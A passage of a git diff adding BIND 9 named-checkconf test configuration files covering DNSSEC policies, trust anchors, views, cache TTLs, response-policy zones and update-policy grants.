y0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQ + YfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX + 2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuw + E60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/ + Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn + 6zqCkwuMmrU="; +}; diff --git a/bin/tests/system/checkconf/good-glue-cache.conf b/bin/tests/system/checkconf/good-glue-cache.conf new file mode 100644 index 0000000..fd5524b --- /dev/null +++ b/bin/tests/system/checkconf/good-glue-cache.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + glue-cache yes; +}; diff --git a/bin/tests/system/checkconf/good-initial-ds.conf b/bin/tests/system/checkconf/good-initial-ds.conf new file mode 100644 index 0000000..b54a2b3 --- /dev/null +++ b/bin/tests/system/checkconf/good-initial-ds.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +trust-anchors { + example. initial-ds 60724 5 2 "29E79B9064EE1A11DF3BFF19581DDFED7952C22CC204ACE17B6007EB1437E9E6"; +}; diff --git a/bin/tests/system/checkconf/good-interface-interval.conf b/bin/tests/system/checkconf/good-interface-interval.conf new file mode 100644 index 0000000..60c50b3 --- /dev/null +++ b/bin/tests/system/checkconf/good-interface-interval.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + interface-interval 1h; +}; diff --git a/bin/tests/system/checkconf/good-kasp.conf b/bin/tests/system/checkconf/good-kasp.conf new file mode 100644 index 0000000..1a12d9f --- /dev/null +++ b/bin/tests/system/checkconf/good-kasp.conf @@ -0,0 +1,68 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * This is just a random selection of DNSSEC configuration options. + */ + +/* cut here */ +dnssec-policy "test" { + dnskey-ttl 3600; + keys { + ksk key-directory lifetime P1Y algorithm ecdsa256; + zsk lifetime P30D algorithm 13; + csk key-directory lifetime unlimited algorithm rsasha256 2048; + }; + max-zone-ttl 86400; + nsec3param iterations 5 optout no salt-length 8; + parent-ds-ttl 7200; + parent-propagation-delay PT1H; + publish-safety PT3600S; + retire-safety PT3600S; + signatures-refresh P3D; + signatures-validity P2W; + signatures-validity-dnskey P14D; + zone-propagation-delay PT5M; +}; +options { + dnssec-policy "default"; +}; +zone "example1" { + type master; + file "example1.db"; + inline-signing yes; +}; +zone "example2" { + type master; + file "example2.db"; + allow-update { + "any"; + }; + dnssec-policy "test"; +}; +zone "example3" { + type master; + file "example3.db"; + inline-signing yes; + dnssec-policy "default"; +}; +zone "dnssec-policy-none-shared-zonefile1" { + type master; + file "shared.db"; + dnssec-policy "none"; +}; +zone "dnssec-policy-none-shared-zonefile2" { + type master; + file "shared.db"; + dnssec-policy "none"; +}; diff --git a/bin/tests/system/checkconf/good-key-directory.conf b/bin/tests/system/checkconf/good-key-directory.conf new file mode 100644 index 0000000..45befff --- /dev/null +++ b/bin/tests/system/checkconf/good-key-directory.conf @@ -0,0 +1,73 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy "internet" { + keys { + ksk key-directory lifetime unlimited algorithm ecdsa256; + zsk key-directory lifetime P90D algorithm ecdsa256; + }; + + nsec3param iterations 15 optout no salt-length 8; +}; + +dnssec-policy "intranet" { + keys { + ksk key-directory lifetime unlimited algorithm ecdsa256; + zsk key-directory lifetime P30D algorithm ecdsa256; + }; + nsec3param iterations 15 optout no salt-length 8; +}; + +dnssec-policy "localhost" { + keys { + ksk key-directory lifetime unlimited algorithm ecdsa256; + zsk key-directory lifetime P30D algorithm ecdsa256; + }; + nsec3param iterations 15 optout no salt-length 8; +}; + +options { + key-directory "global/keys"; +}; + +view "localhost" { + match-clients { 127.0.0.1; ::1; }; + zone "example.com" IN { + type primary; + file "localhost/example.com.zone"; + dnssec-policy "localhost"; + inline-signing yes; + }; +}; + +view "external" { + match-clients { 0/0; }; + key-directory "external/keys"; + zone "example.com" IN { + type primary; + file "external/example.com.zone"; + dnssec-policy "internet"; + inline-signing yes; + }; +}; + +view "internal" { + match-clients { ::/0; }; + key-directory "internal/keys"; + zone "example.com" IN { + type primary; + file "internal/example.com.zone"; + dnssec-policy "intranet"; + inline-signing yes; + }; +}; diff --git a/bin/tests/system/checkconf/good-lmdb-mapsize-largest.conf b/bin/tests/system/checkconf/good-lmdb-mapsize-largest.conf new file mode 100644 index 0000000..a55b835 --- /dev/null +++ b/bin/tests/system/checkconf/good-lmdb-mapsize-largest.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + lmdb-mapsize 1024G; +}; diff --git a/bin/tests/system/checkconf/good-lmdb-mapsize-smallest.conf b/bin/tests/system/checkconf/good-lmdb-mapsize-smallest.conf new file mode 100644 index 0000000..4478706 --- /dev/null +++ b/bin/tests/system/checkconf/good-lmdb-mapsize-smallest.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + lmdb-mapsize 1M; +}; diff --git a/bin/tests/system/checkconf/good-masterfile-format-raw.conf b/bin/tests/system/checkconf/good-masterfile-format-raw.conf new file mode 100644 index 0000000..b6f3cbf --- /dev/null +++ b/bin/tests/system/checkconf/good-masterfile-format-raw.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 5300; +}; + +zone example { + type secondary; + primaries { ::1; }; + masterfile-format raw; +}; diff --git a/bin/tests/system/checkconf/good-masterfile-format-text.conf b/bin/tests/system/checkconf/good-masterfile-format-text.conf new file mode 100644 index 0000000..8138058 --- /dev/null +++ b/bin/tests/system/checkconf/good-masterfile-format-text.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 5300; +}; + +zone example { + type secondary; + primaries { ::1; }; + masterfile-format text; +}; diff --git a/bin/tests/system/checkconf/good-masters-and-primaries.conf b/bin/tests/system/checkconf/good-masters-and-primaries.conf new file mode 100644 index 0000000..d84657f --- /dev/null +++ b/bin/tests/system/checkconf/good-masters-and-primaries.conf @@ -0,0 +1,15 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +masters a { 1.2.3.4; }; +primaries b { 1.2.3.4; }; diff --git a/bin/tests/system/checkconf/good-maxcachettl.conf b/bin/tests/system/checkconf/good-maxcachettl.conf new file mode 100644 index 0000000..58f6901 --- /dev/null +++ b/bin/tests/system/checkconf/good-maxcachettl.conf @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view one { + max-cache-ttl 0; +}; +view two { + max-cache-ttl 86400; +}; +view three { + max-cache-ttl 4000000000; +}; +view four { + max-cache-ttl 3600s; +}; +view five { + max-cache-ttl 1h; +}; +view six { + max-cache-ttl 1d; +}; +view seven { + max-cache-ttl 1w; +}; diff --git a/bin/tests/system/checkconf/good-maxncachettl.conf b/bin/tests/system/checkconf/good-maxncachettl.conf new file mode 100644 index 0000000..80dc753 --- /dev/null +++ b/bin/tests/system/checkconf/good-maxncachettl.conf @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view one { + max-ncache-ttl 0; +}; +view two { + max-ncache-ttl 86400; +}; +view three { + max-ncache-ttl 604800; +}; +view four { + max-ncache-ttl 3600s; +}; +view five { + max-ncache-ttl 1h; +}; +view six { + max-ncache-ttl 1d; +}; +view seven { + max-ncache-ttl 1w; +}; diff --git a/bin/tests/system/checkconf/good-maxratio1.conf b/bin/tests/system/checkconf/good-maxratio1.conf new file mode 100644 index 0000000..add6b1a --- /dev/null +++ b/bin/tests/system/checkconf/good-maxratio1.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone example { + type master; + masterfile-format map; + file "example.db"; + max-ixfr-ratio 50%; +}; diff --git a/bin/tests/system/checkconf/good-maxratio2.conf b/bin/tests/system/checkconf/good-maxratio2.conf new file mode 100644 index 0000000..be61ae2 --- /dev/null +++ b/bin/tests/system/checkconf/good-maxratio2.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone example { + type master; + masterfile-format map; + file "example.db"; + max-ixfr-ratio unlimited; +}; diff --git a/bin/tests/system/checkconf/good-mincachettl.conf b/bin/tests/system/checkconf/good-mincachettl.conf new file mode 100644 index 0000000..b619a73 --- /dev/null +++ b/bin/tests/system/checkconf/good-mincachettl.conf @@ -0,0 +1,28 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view one { + min-cache-ttl 0; +}; +view two { + min-cache-ttl 30; +}; +view three { + min-cache-ttl 60; +}; +view four { + min-cache-ttl 90s; +}; +view five { + min-cache-ttl 1m; +}; diff --git a/bin/tests/system/checkconf/good-minncachettl.conf b/bin/tests/system/checkconf/good-minncachettl.conf new file mode 100644 index 0000000..3e4101b --- /dev/null +++ b/bin/tests/system/checkconf/good-minncachettl.conf @@ -0,0 +1,28 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view one { + min-ncache-ttl 0; +}; +view two { + min-ncache-ttl 30; +}; +view three { + min-ncache-ttl 60; +}; +view four { + min-ncache-ttl 90s; +}; +view five { + min-ncache-ttl 1m; +}; diff --git a/bin/tests/system/checkconf/good-mirror-inherited-notify-yes.conf b/bin/tests/system/checkconf/good-mirror-inherited-notify-yes.conf new file mode 100644 index 0000000..09bbf94 --- /dev/null +++ b/bin/tests/system/checkconf/good-mirror-inherited-notify-yes.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + notify yes; +}; + +zone "." { + type mirror; +}; diff --git a/bin/tests/system/checkconf/good-mirror-root-zone-without-masters.conf b/bin/tests/system/checkconf/good-mirror-root-zone-without-masters.conf new file mode 100644 index 0000000..9723b7a --- /dev/null +++ b/bin/tests/system/checkconf/good-mirror-root-zone-without-masters.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "." { + type mirror; +}; diff --git a/bin/tests/system/checkconf/good-nested.conf b/bin/tests/system/checkconf/good-nested.conf new file mode 100644 index 0000000..12a027c --- /dev/null +++ b/bin/tests/system/checkconf/good-nested.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl a { 127.0.0.1; ::1; }; +acl b { a; }; +acl c { !b; }; + +options { + allow-query { c; }; +}; diff --git a/bin/tests/system/checkconf/good-notify-source-v6.conf b/bin/tests/system/checkconf/good-notify-source-v6.conf new file mode 100644 index 0000000..797f966 --- /dev/null +++ b/bin/tests/system/checkconf/good-notify-source-v6.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 5300; +}; + +zone example { + type secondary; + primaries { 1.2.3.4; }; + notify-source-v6 fd92:7065:b8e:ffff::1; +}; diff --git a/bin/tests/system/checkconf/good-notify-source.conf b/bin/tests/system/checkconf/good-notify-source.conf new file mode 100644 index 0000000..6b97314 --- /dev/null +++ b/bin/tests/system/checkconf/good-notify-source.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 5300; +}; + +zone example { + type secondary; + primaries { 1.2.3.4; }; + notify-source 10.53.0.1; +}; diff --git a/bin/tests/system/checkconf/good-options-also-notify.conf b/bin/tests/system/checkconf/good-options-also-notify.conf new file mode 100644 index 0000000..75066ef --- /dev/null +++ b/bin/tests/system/checkconf/good-options-also-notify.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + also-notify { missing; }; +}; + +zone "example.net" { + type slave; + notify no; + masters { 192.168.1.1; }; +}; diff --git a/bin/tests/system/checkconf/good-parental-source-v6.conf b/bin/tests/system/checkconf/good-parental-source-v6.conf new file mode 100644 index 0000000..fe998f1 --- /dev/null +++ b/bin/tests/system/checkconf/good-parental-source-v6.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 5300; +}; + +zone example { + type secondary; + primaries { 1.2.3.4; }; + parental-source-v6 fd92:7065:b8e:ffff::1; +}; diff --git a/bin/tests/system/checkconf/good-parental-source.conf b/bin/tests/system/checkconf/good-parental-source.conf new file mode 100644 index 0000000..e45856a --- /dev/null +++ b/bin/tests/system/checkconf/good-parental-source.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 5300; +}; + +zone example { + type secondary; + primaries { 1.2.3.4; }; + parental-source 10.53.0.1; +}; diff --git a/bin/tests/system/checkconf/good-printtime.conf b/bin/tests/system/checkconf/good-printtime.conf new file mode 100644 index 0000000..06bb7be --- /dev/null +++ b/bin/tests/system/checkconf/good-printtime.conf @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +logging { + channel one { + file "one.out"; + print-time no; + }; + channel two { + file "two.out"; + print-time yes; + }; + channel three { + file "three.out"; + print-time local; + }; + channel four { + file "four.out"; + print-time iso8601; + }; + channel five { + file "five.out"; + print-time iso8601-utc; + }; +}; diff --git a/bin/tests/system/checkconf/good-response-dot.conf b/bin/tests/system/checkconf/good-response-dot.conf new file mode 100644 index 0000000..68bd96e --- /dev/null +++ b/bin/tests/system/checkconf/good-response-dot.conf @@ -0,0 +1,23 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com." { + type master; + file "example.com.zone"; +}; + +options { + response-policy { + zone "example.com." policy given; + }; +}; diff --git a/bin/tests/system/checkconf/good-rpz-ttl.conf b/bin/tests/system/checkconf/good-rpz-ttl.conf new file mode 100644 index 0000000..b40a3d5 --- /dev/null +++ b/bin/tests/system/checkconf/good-rpz-ttl.conf @@ -0,0 +1,24 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com." { + type master; + file "example.com.zone"; +}; + +options { + response-policy { + zone "example.com." policy given; + } + max-policy-ttl 1h; +}; diff --git a/bin/tests/system/checkconf/good-rpz-update.conf b/bin/tests/system/checkconf/good-rpz-update.conf new file mode 100644 index 0000000..2ad6bc1 --- /dev/null +++ b/bin/tests/system/checkconf/good-rpz-update.conf @@ -0,0 +1,25 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com." { + type master; + file "example.com.zone"; +}; + +options { + response-policy { + zone "example.com." + policy given + min-update-interval 5m; + }; +}; diff --git a/bin/tests/system/checkconf/good-rrset-order-none.conf b/bin/tests/system/checkconf/good-rrset-order-none.conf new file mode 100644 index 0000000..f0818ca --- /dev/null +++ b/bin/tests/system/checkconf/good-rrset-order-none.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + rrset-order { + order none; + }; +}; diff --git a/bin/tests/system/checkconf/good-static-ds.conf b/bin/tests/system/checkconf/good-static-ds.conf new file mode 100644 index 0000000..be7412a --- /dev/null +++ b/bin/tests/system/checkconf/good-static-ds.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +trust-anchors { + example. static-ds 60724 5 2 "29E79B9064EE1A11DF3BFF19581DDFED7952C22CC204ACE17B6007EB1437E9E6"; +}; diff --git a/bin/tests/system/checkconf/good-transfer-source-v6.conf b/bin/tests/system/checkconf/good-transfer-source-v6.conf new file mode 100644 index 0000000..0527b85 --- /dev/null +++ b/bin/tests/system/checkconf/good-transfer-source-v6.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 5300; +}; + +zone example { + type secondary; + primaries { 1.2.3.4; }; + transfer-source-v6 fd92:7065:b8e:ffff::1; +}; diff --git a/bin/tests/system/checkconf/good-transfer-source.conf b/bin/tests/system/checkconf/good-transfer-source.conf new file mode 100644 index 0000000..df23d1c --- /dev/null +++ b/bin/tests/system/checkconf/good-transfer-source.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 5300; +}; + +zone example { + type secondary; + primaries { 1.2.3.4; }; + transfer-source 10.53.0.1; +}; diff --git a/bin/tests/system/checkconf/good-update-policy1.conf b/bin/tests/system/checkconf/good-update-policy1.conf new file mode 100644 index 0000000..b696d8d --- /dev/null +++ b/bin/tests/system/checkconf/good-update-policy1.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * self * TXT; + }; +}; diff --git a/bin/tests/system/checkconf/good-update-policy10.conf b/bin/tests/system/checkconf/good-update-policy10.conf new file mode 100644 index 0000000..7035741 --- /dev/null +++ b/bin/tests/system/checkconf/good-update-policy10.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * krb5-subdomain . TXT; + }; +}; diff --git a/bin/tests/system/checkconf/good-update-policy11.conf b/bin/tests/system/checkconf/good-update-policy11.conf new file mode 100644 index 0000000..8d1027f --- /dev/null +++ b/bin/tests/system/checkconf/good-update-policy11.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * tcp-self . TXT; + }; +}; diff --git a/bin/tests/system/checkconf/good-update-policy12.conf b/bin/tests/system/checkconf/good-update-policy12.conf new file mode 100644 index 0000000..10f1f3f --- /dev/null +++ b/bin/tests/system/checkconf/good-update-policy12.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * 6to4-self . TXT; + }; +}; diff --git a/bin/tests/system/checkconf/good-update-policy2.conf b/bin/tests/system/checkconf/good-update-policy2.conf new file mode 100644 index 0000000..06a35ab --- /dev/null +++ b/bin/tests/system/checkconf/good-update-policy2.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * self . TXT; + }; +}; diff --git a/bin/tests/system/checkconf/good-update-policy3.conf b/bin/tests/system/checkconf/good-update-policy3.conf new file mode 100644 index 0000000..1468a71 --- /dev/null +++ b/bin/tests/system/checkconf/good-update-policy3.conf @@ -0,0 +1,20 